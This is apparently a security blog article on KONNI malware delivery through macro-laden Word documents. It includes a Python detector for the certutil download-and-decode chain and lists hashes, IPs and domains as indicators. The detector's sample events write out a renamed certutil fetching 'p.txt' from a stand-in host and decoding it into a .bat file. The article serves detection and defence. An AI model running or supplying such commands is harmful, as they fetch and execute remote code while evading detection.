Phishing Emails Used to Deploy KONNI Malware

KONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code.

The macro code can change the document's font color from light grey to black (a lure to trick the user into clicking "Enable Content"), check whether the Windows installation is 32-bit or 64-bit, and construct and execute a command line that downloads additional files.

Once the VBA macro has constructed the command line, it uses the Windows certificate utility CertUtil (certutil.exe) to download remote files from a given Uniform Resource Locator (URL). CertUtil's built-in base64 decoding function is also used to decode the downloaded files. The Command Prompt silently copies certutil.exe into a temp directory and renames the copy to evade detection.

The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.
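The chain described above (Office spawning a shell, certutil.exe copied into a temp directory under another name, then the renamed copy used to fetch a URL and base64-decode the result) leaves a recognisable trail in process-creation telemetry. The following detection logic is an added example written for this article, not code from the original post or from the referenced campaign analysis. The event fields (Image, ParentImage, CommandLine, OriginalFileName) are modelled on Sysmon Event ID 1, and the sample events, paths and URL are constructed for illustration; the rule names are my own.

```python
"""Detect the CertUtil download/decode chain in process-creation events.

Added example for this article (not the original post's code). Events are
modelled on Sysmon Event ID 1 fields; all sample values are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str              # full path of the created process
    parent_image: str       # full path of the parent process
    command_line: str
    original_file_name: str = ""   # PE OriginalFileName (survives a rename on disk)


@dataclass
class Finding:
    rule: str
    event: ProcEvent


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# certutil switches that turn the tool into a downloader / decoder
URL_FETCH = re.compile(r"(?i)-urlcache\b")
DECODE = re.compile(r"(?i)-decode\b")
TEMP_PATH = re.compile(r"(?i)\\(temp|tmp)\\")
COPY_CERTUTIL = re.compile(r"(?i)\bcopy\b.*certutil\.exe")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> list[Finding]:
    """Apply every rule to one event and return the matches."""
    findings: list[Finding] = []
    img = basename(ev.image)
    parent = basename(ev.parent_image)
    cmd = ev.command_line
    orig = ev.original_file_name.lower()

    # 1. The macro's command line starts a shell from an Office process.
    if parent in OFFICE_APPS and img in SHELLS:
        findings.append(Finding("office_spawns_shell", ev))

    # 2. cmd.exe copying certutil.exe into a temp directory.
    if img == "cmd.exe" and COPY_CERTUTIL.search(cmd) and TEMP_PATH.search(cmd):
        findings.append(Finding("certutil_copied_to_temp", ev))

    # 3. A renamed copy: the on-disk name differs from the PE's original name.
    is_certutil = img == "certutil.exe" or orig == "certutil.exe"
    if orig == "certutil.exe" and img != "certutil.exe":
        findings.append(Finding("renamed_certutil", ev))

    # 4/5. CertUtil (renamed or not) used to fetch a URL or decode base64.
    if is_certutil and URL_FETCH.search(cmd):
        findings.append(Finding("certutil_url_download", ev))
    if is_certutil and DECODE.search(cmd):
        findings.append(Finding("certutil_base64_decode", ev))
    return findings


def scan(events: list[ProcEvent]) -> list[Finding]:
    """Run check_event over a batch of events."""
    return [f for ev in events for f in check_event(ev)]


# Constructed sample telemetry following the chain described in the article.
TMP = r"C:\Users\victim\AppData\Local\Temp"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              rf'cmd.exe /c copy C:\Windows\System32\certutil.exe "{TMP}\svchst.exe"'),
    ProcEvent(rf"{TMP}\svchst.exe", r"C:\Windows\System32\cmd.exe",
              rf'svchst.exe -urlcache -split -f http://example.invalid/p.txt "{TMP}\p.txt"',
              original_file_name="CertUtil.exe"),
    ProcEvent(rf"{TMP}\svchst.exe", r"C:\Windows\System32\cmd.exe",
              rf'svchst.exe -decode "{TMP}\p.txt" "{TMP}\p.bat"',
              original_file_name="CertUtil.exe"),
    # Benign baseline: an administrator dumping a certificate file.
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil.exe -dump C:\certs\server.cer",
              original_file_name="CertUtil.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:26} {f.event.command_line}")
```

The OriginalFileName check is what catches the renamed copy: a rename on disk does not alter the PE version resource, so correlating the two names flags the temp-directory copy even when the command line itself looks innocuous. The benign `-dump` event matches nothing, which is the point of gating the download and decode rules on the specific switches rather than on the presence of certutil alone.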

Further information – https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

IOCs

Lure Documents

  • 8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd
  • 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726
  • ed63e84985e1af9c4764e6b6ca513ec1c16840fb2534b86f95e31801468be67a

Konni Loader

  • 6a22db7df237c085855deb48686217173dc2664f4b927ebe238d4442b68a2fd3
  • 2ab1b28bae24217e8b6dd0cd30bb7258fa34c0d7337ecfea55e4310d08aeb1e6

Konni final payload

  • e94fa697d8661d79260edf17c0a519fae4b2a64037aa79b29d6631205995fdad
  • 6256ba2b89c78877328cc70d45db980310a51545a83d1d922d64048b57d6c057
  • 52ba17b90244a46e0ef2a653452b26bcb94f0a03b999c343301fef4e3c1ec5d2
  • 7d2b1af486610a45f78a573af9a9ad00414680ff8e958cfb5437a1b140acb60c
  • ceb8093507911939a17c6c7b39475f5d4db70a9ed3b85ef34ff5e6372b20a73e
  • 8795b2756efa32d5101a8d38ea27fca9c8c7ed1d54da98f0520f72706d1c5105
  • 7f6984fa9d0bbc1bd6ab531f0a8c2f4beb15de30f2b20054d3980395d77665af
  • 290c942da70c68d28a387775fbb7e6cab6749547d278cb755b4999e0fe61a09f
  • 274e706809a1c0363f78363d0c6a7d256be5be11039de14f617265e01d550a98

IP Addresses

  • 69.197.143.12
  • 185.27.134.11
  • 88.99.13.69
  • 162.253.155.226

Domains

  • clean.1apps[.]com
  • handicap.eu5[.]org
  • panda2019.eu5[.]org
  • ftpupload[.]net

Duncan Newell

Duncan is a technology professional with over 20 years' experience of working in various IT roles. He has an interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.
